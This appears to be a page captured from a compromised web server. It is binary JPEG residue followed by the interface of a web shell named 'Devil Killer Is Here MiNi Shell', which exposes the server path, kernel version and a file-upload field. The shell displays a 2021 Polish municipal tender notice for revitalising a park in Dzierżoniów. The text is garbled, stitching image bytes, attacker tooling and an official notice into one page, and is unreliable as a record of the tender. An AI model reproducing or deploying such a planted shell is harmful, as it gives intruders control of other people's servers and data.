JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211029/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211029/0025075501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykon. robót bud. pol. na rewitalizacji parku przy skrzyżowaniu ulic Daszyńskiego i Piłsudskiego na działce nr 159/14 obręb Centrum w ramach zadania pn.: „Rewitalizacja parku Miłośników Dzierżoniowa”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Dzierżoniów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890717830</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dzierżoniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 746450397</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 746450882</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@um.dzierzoniow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://dzierzoniow.ezamawiajacy.pl/, https://bip.um.dzierzoniow.pl/, https://dzierzoniow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykon. robót bud. pol. na rewitalizacji parku przy skrzyżowaniu ulic Daszyńskiego i Piłsudskiego na działce nr 159/14 obręb Centrum w ramach zadania pn.: „Rewitalizacja parku Miłośników Dzierżoniowa”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d21eeee4-387e-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00250755</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001996/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Rewitalizacja Parku Miłośników Dzierżoniowa – roboty budowlane</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://dzierzoniow.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://dzierzoniow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformie zakupowej<br/>eZamawiajacy, tj.: Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512<br/>kb/s; Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze<br/>wersje;Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej<br/>wersji w przypadku Internet Explorer minimalnie wersja 10.0;Włączona obsługa JavaScript;<br/>Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. Zamawiający<br/>określa informacje na temat kodowania i czasu odbioru danych tj.: Plik załączony przez Wykonawcę na<br/>Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania<br/>UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po<br/>upływie terminu otwarcia ofert. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz<br/>dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim<br/>źródłem czasu. Zamawiający określił dopuszczalne formaty przesyłanych danych w SWZ tj. plików o<br/>wielkości do 100 MB. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .rtf .xls .jpg<br/>(.jpeg) ze szczególnym wskazaniem na .pdf. W celu ewentualnej kompresji danych Zamawiający<br/>rekomenduje wykorzystanie jednego z formatów: .zip lub .7Z. Wymagania techniczne i organizacyjne<br/>sporządzania, wysyłania i odbierania korespondencji elektronicznej zostały opisane na Platformie w<br/>zakładce „Regulacje i procedury procesu zakupowego” pod adresem internetowym https://dzierzoniow.ezamawiajacy.pl/. Wszelką korespondencję związaną z postępowaniem, należy<br/>przekazywać za pośrednictwem Platformy. Korespondencję uważa się za przekazaną w terminie, jeżeli<br/>dotrze do Zamawiającego przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej<br/>niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.<br/>Oferta wraz z załącznikami musi zostać w ogólnie przyjętych formatach danych i<br/>złożona w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci<br/>elektronicznej opatrzonej podpisem osobistym albo podpisem zaufanym pod rygorem nieważności.<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów<br/>musi być zgodny z wymogami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz Rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z<br/>dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: Administratorem Danych jest Gmina Miejska<br/>Dzierżoniów reprezentowana przez Burmistrza Dzierżoniowa ul. Rynek 1, 58-200 Dzierżoniów tel. 74<br/>645 0800; Inspektor Ochrony Danych - Kontakt: Urząd Miasta w Dzierżoniowie, ul. Rynek 1, pok. 22<br/>tel. 74 645 0808, e-mail: inspektorodo@um.dzierzoniow.pl; Będziemy przetwarzać Twoje dane w celu<br/>przeprowadzenia zamówienia publicznego, a w przypadku wyboru najkorzystniejszej oferty w celu<br/>zawarcia i realizacji umowy, Będziemy przetwarzać Twoje dane na podstawie: 1. Art. 6 ust. 1 lit. c<br/>RODO, tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na<br/>administratorze 2. Ustawy z dnia 11.09.2019r. Prawo zamówień publicznych wraz z aktami<br/>wykonawczymi do ustawy 3. Ustawy z dnia 27.08.2009r. o finansach publicznych. W przypadku wyboru<br/>najkorzystniejszej oferty również na podstawie art. 6 ust. 1 lit. b) RODO- tj. przetwarzanie jest<br/>niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą lub do podjęcia działań<br/>na żądanie osoby, której dane dotyczą przed zawarciem umowy; Twoje dane osobowe będą<br/>przechowywane przez okres wynikający z jednolitego rzeczowego wykazu akt lub przez okres trwałości<br/>projektu dofinansowanego ze źródeł zewnętrznych wynikający z odrębnych przepisów prawa;<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp; Odbiorcy Twoich danych - Twoje dane osobowe w postaci nazwy/imienia i nazwiska oraz<br/>adresu prowadzenia działalności gospodarczej mogą zostać udostępnione:- w Biuletynie Zamówień<br/>Publicznych / w Dzienniku Urzędowym Unii Europejskiej,- na Platformie Zakupowej eZamawiający,-w<br/>Biuletynie Informacji Publicznej Urzędu Miasta w Dzierżoniowie,-wykonawcom biorącym udział w<br/>postępowaniu,-organom upoważnionym na mocy przepisów prawa,-wykonawcom świadczącym usługi<br/>na rzecz Zamawiającego, min. firma Market Planet Otwarty Rynek Elektroniczny S.A.-dostawca<br/>platformy zakupowej do obsługi zamówień publicznych.Ponadto po zawarciu umowy w/w dane mogą<br/>zostać udostępnione każdej osobie, która wystąpi z wnioskiem o ich udostępnienie w trybie dostępu do informacji publicznej (jeśli nie będą zachodziły przesłanki wyłączające); Twoje prawa związane z<br/>przetwarzaniem danych osobowych - Przysługują Ci, w sytuacjach określonych prawem, następujące<br/>prawa związane z przetwarzaniem danych osobowych:- na podstawie art. 15 RODO prawo dostępu do<br/>danych osobowych Pani/Pana dotyczących;- na podstawie art. 16 RODO prawo do sprostowania<br/>Pani/Pana danych osobowych ;- na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18<br/>ust. 2 RODO ; - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;Nie przysługuje Ci:- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;- na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Klauzula<br/>informacyjna stanowi załącznik nr 11 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR-P.271.98.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na rewitalizacji parku przy skrzyżowaniu ulic Daszyńskiego i Piłsudskiego na działce nr 159/14 obręb Centrum w ramach zadania pn.: „Rewitalizacja parku Miłośników Dzierżoniowa”. Przedmiot zamówienia będzie realizowany w ramach dofinansowania ze środków Rządowego Funduszu Inwestycji Lokalnych.<br/><br/>2. Zakres przedmiotu zamówienia dotyczy wykonania robót budowlanych w oparciu o posiadaną przez Zamawiającego dokumentację projektową, dla której została wydana przez DWKZ decyzje pozwolenia na prowadzenie robót budowlanych nr 650/2021, decyzja na usunięcie drzew i krzewów nr 106/2021 oraz wydane przez Starostę Dzierżoniowskiego brak sprzeciwu na wykonanie robót budowlanych w zakresie budowy elementów małej architektury i budowę sieci elektroenergetycznej, które obejmują w szczególności:<br/>1) demontaż starych urządzeń małej architektury (ławki, kosze, donice),<br/>2) demontaż istniejących słupów oświetleniowych wraz z oprawami,<br/>3) usunięcie z ciągów pieszych nawierzchni asfaltowej wraz z podbudową,<br/>4) usunięcie z terenu przeznaczonego pod fontannę nawierzchni betonowej wraz z podbudową,<br/>5) remont murku oporowego wraz ze schodami terenowymi,<br/>6) budowę ciągów pieszych o nawierzchni z kostki granitowej,<br/>7) budowę ciągów pieszych o nawierzchni mineralnej,<br/>8) budowę fontanny posadzkowej wraz z infrastrukturą,<br/>9) budowę oświetlenia parkowego typu LED,<br/>10) budowę iluminacji 2 szt. drzew,<br/>11) aranżację terenów zielonych, w tym: między innymi wycinka, karczowanie drzew i krzewów, pielęgnacja, nasadzenia, rekultywacja gleby, wysiew trawy oraz wywóz i utylizacja usuniętych drzew i krzewów,<br/>12) kupno, dostawę i montaż małej architektury, w tym: ławki, kosze na śmieci, tablice informacyjne (2 szt.),<br/>13) wykonanie wszystkich robót towarzyszących, w tym związanych z powiązaniem z istniejącymi sąsiadującymi chodnikami, schodami, dojściami do budynków, itp. W przypadku ingerencji w obiekty przyległe należy uwzględnić ich naprawę, uzupełnienie itp.<br/>14) wyregulowanie do zaprojektowanych rzędnych wszystkich istniejących urządzeń (zasuw, zaworów, studni, itp.)<br/>15) umieszczenie tablicy informacyjnej o dofinansowaniu inwestycji zgodnie ze wzorem i zasadami określonymi w załączniku nr 1 do projektu umowy (tablicę do montażu dostarczy Zamawiający). W zakresie obowiązków Wykonawcy po zakończeniu robót budowlanych leży również obowiązek montażu tej samej tablicy na dwóch ocynkowanych słupkach w miejscu wskazanym przez Zamawiającego.<br/><br/>3. Szczegółowy zakres przedmiotu zamówienia, został określony w:<br/>1) Projekcie Budowlanym pn.: „Zagospodarowanie Rynku i Terenów w Obrębie Staromiejskiego Centrum Dzierżoniowa”:<br/>a) zagospodarowanie terenu - Projektant mgr inż. Architekt Joanna Ziemek,<br/>b) branża instalacyjna – przyłącze wodociągowe do fontanny – Projektant mgr inż. Kazimierz Strzelczyk,<br/>c) branża elektryczna - Projektant mgr inż. Arkadiusz Sadowski.<br/>2) Projekcie Wykonawczym pn.: „Zagospodarowanie Rynku i Terenów w Obrębie Staromiejskiego Centrum Dzierżoniowa”:<br/>a) zagospodarowanie terenu - Projektant mgr inż. Architekt Joanna Ziemek,<br/>b) branża instalacyjna – przyłącze wodociągowe do fontanny – Projektant mgr inż. Kazimierz Strzelczyk,<br/>c) fontanna parkowa - Projektant mgr inż. Grzegorz Marcinek.<br/>3) Projekcie Technicznym pn.: „Zagospodarowanie Rynku i Terenów w Obrębie Staromiejskiego Centrum Dzierżoniowa” - branża elektryczna. Projektant Arkadiusz Sadowski.<br/>4) Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych <br/>pn.: „Zagospodarowanie Rynku i Terenów w Obrębie Staromiejskiego Centrum Dzierżoniowa” :<br/>a) zagospodarowanie terenu - wykonał mgr inż. Piotr Siwik,<br/>b) branża instalacyjna – przyłącze wodociągowe do fontanny – wykonał mgr inż. Kazimierz Strzelczyk,<br/>c) branża elektryczna - wykonał mgr inż. Jarosław Wirszyc,<br/>d) fontanna parkowa - wykonał mgr inż. Grzegorz Marcinek,<br/>5) Inwentaryzacji dendrologicznej – wykonał mgr inż. Piotr Siwik,<br/>6) Programie robót budowlanych - wykonał mgr inż. Piotr Siwik.<br/><br/>4. Wykonawca zobowiązany jest do wykonania zakresu robót wskazanych w dokumentacji projektowej, w tym projekcie budowlanym, wykonawczym i technicznym, który jest określony w formie opisu technicznego lub na rysunkach lub równocześnie w opisie i na rysunkach. Zarówno opis techniczny jak i rysunki (część graficzna) projektów są równoważne i opisują przedmiot zamówienia.<br/><br/>5. Wykonawca zobowiązany jest do wykonania robót budowlanych i robót dla potrzeb prowadzenia badań archeologicznych zgodnie ze sztuką budowlaną i zgodnie z zaleceniami nadzoru inwestorskiego, archeologicznego, dokumentacją projektową, specyfikacją techniczną wykonania robót, z uwzględnieniem likwidacji barier architektonicznych dla osób niepełnosprawnych, na podstawie decyzji nr 106/2021 z dnia 26.01.2021, decyzji 650/2021 z dnia10.06.2021r. Wydanych przez Dolnośląskiego Wojewódzkiego Konserwatora Zabytków we Wrocławiu Delegatura w Wałbrzychu oraz zaświadczeniu o braku podstaw do wniesienia sprzeciwu nr BA.6743.1.128.2021 z dnia 31.08.2021r. oraz braku podstaw do wniesienia sprzeciwu nr BA.6743.1.118.2021 z dnia 06.09.2021r. wydanych przez Starostę Dzierżoniowskiego.<br/><br/>6. Roboty budowlane będą prowadzone pod nadzorem archeologicznym, pełnionym przez inspektora nadzoru, który będzie kierował badaniami archeologicznymi i dokumentował je zgodnie z uzyskaną od DWKZ decyzją na podstawie opracowanego programu badań archeologicznych.<br/><br/>7. Zamawiający zobowiązuje się do zapewnienia nadzoru archeologicznego nad robotami oraz do kierowania badaniami archeologicznymi.<br/><br/>8. Wykonawca zobowiązuje się ponadto do:<br/>1) protokolarnego przejęcia terenu budowy, jego zabezpieczenia, oznakowania, oddzielenia ogrodzeniem tymczasowym oraz należytego utrzymania,<br/>2) przed rozpoczęciem robót budowlanych umieszczenia w widocznym miejscu tablicy informacyjnej dotyczącej dofinansowania inwestycji, otrzymanej w dniu przekazania terenu budowy, <br/>3) zabezpieczenia przed uszkodzeniem drzew i krzew znajdujące się w odległości poniżej 1,0m od planowanej trasy przejazdu sprzętu budowlanego i transportowego oraz prowadzonych robót ziemnych,<br/>4) zabezpieczenia przed uszkodzeniem niezależnie od oddalenia od prowadzonych robót pni drzew dorodnych: Buk, Jesion i Sosna Czarna,<br/>5) organizacji zaplecza budowy oraz pomieszczeń socjalno-sanitarnych dla pracowników i miejsca składowania materiałów, <br/>6) zapewnienia dostawy niezbędnych mediów do realizacji robót i opłatę za ich dostawę. Wykonawca we własnym zakresie zapewnia niezbędne media warunkujące prawidłowe wykonawstwo robót,<br/>7) poniesienia wszelkich kosztów związanych z realizacją, nadzorem <br/>i wypełnieniem wszystkich zobowiązań wynikających, z decyzji i braku sprzeciwu oraz zobowiązań wynikających z uzyskanych uzgodnień i opinii oraz tych, które Wykonawca zobowiązany jest uzyskać w trakcie realizacji robót budowlanych i konserwatorskich,<br/>8) wykonania badań, prób i pomiarów w czasie wykonywania robót budowlanych i badań odbiorczych zgodnie ze specyfikacjami technicznymi,<br/>9) przekazania Zamawiającemu w dniu podpisania umowy oświadczeń <br/>o podjęciu obowiązków przez kierownika budowy i kierowników robót,<br/>10) czyszczenia na bieżąco nawierzchni przyległego terenu i ulic w przypadku nawożenia błota z terenu budowy na kołach maszyn, samochodów i innych urządzeń technicznych,<br/>11) uporządkowania terenu budowy i przywrócenia terenu przyległego po zakończeniu robót do stanu pierwotnego,<br/>12) wywozu materiału i gruzu z rozbiórki, mas mineralno-bitumicznych <br/>i zbędnych materiałów oraz niepotrzebnych urządzeń na składowisko odpadów i poniesienia kosztów ich składowania i utylizowania,<br/>13) przekazania Zamawiającemu z dowozem (odl. ok.7km) zdemontowane ze słupów oświetleniowych oprawy, ławki, betonowe kosze na śmieci i kostkę betonową z rozbiórki. Kostkę należy spaletować i zabezpieczyć, <br/>14) obsługi geodezyjnej w trakcie realizacji robót budowlanych, jak i do wykonania pomiaru geodezyjnego powykonawczego wraz ze stroną tytułową i legendą, <br/>15) wykonania po robotach konserwatorskich dokumentacji powykonawczej opisowo-fotograficznej,<br/>16) przedłożenia Zamawiającemu przed podpisaniem umowy dokumentów wynikających ze Specyfikacji Warunków Zamówienia,<br/>17) wykonania Planu Bezpieczeństwa i Ochrony Zdrowia,<br/>18) uczestnictwa kierownika budowy w cotygodniowych radach budowy oraz uczestnictwa kierownika robót branżowych w okresie wykonywania ich robót branżowych,<br/>19) przygotowania na bieżąco rozliczeń budowy, faktur według zaleceń Zamawiającego,<br/>20) innych niezbędnych czynności wymaganych przepisami prawa, <br/>a związanych z realizacją przedmiotu zamówienia,<br/>21) pełnienia funkcji koordynacyjnych w stosunku do robót realizowanych przez podwykonawców, <br/>22) wykonywanie poleceń inspektora nadzoru badań archeologicznych,<br/>23) ochrony punktów osnowy geodezyjnej, a w przypadku ich zniszczenia, bądź uszkodzenia lub konieczności przeniesienia zlecenia uprawnionej jednostce wykonawstwa geodezyjnego ich odtworzenia lub założenia nowych,<br/>24) wypełnienie zobowiązań również tych leżących po stronie Inwestora (Gminy) wynikających z uzgodnień, pozwoleń i decyzji, w tym konserwatorskich zawartych w projekcie budowlanym jak również tych, które zostaną wydane w toku realizacji robót.<br/>9. Wspólny Słownik Zamówień: <br/>Główny przedmiot : 45000000-7 Roboty budowlane<br/>Dodatkowe przedmioty:<br/>45223200-8 Roboty konstrukcyjne<br/>45233161-5 Roboty budowlane w zakresie ścieżek pieszych<br/>45316100-6 Instalowanie urządzeń oświetlenia zewnętrznego<br/>45330000-9 Roboty instalacyjne wodno-kanalizacyjne i sanitarne<br/>10. Gwarancja i rękojmia<br/>Wymagany okres gwarancji - zgodnie z ofertą, minimum 48 miesięcy, maksymalnie 72 miesiące.<br/>Wykonawca ponosi odpowiedzialność z tytułu rękojmi za wady fizyczne i prawne na zasadach określonych w Kodeksie 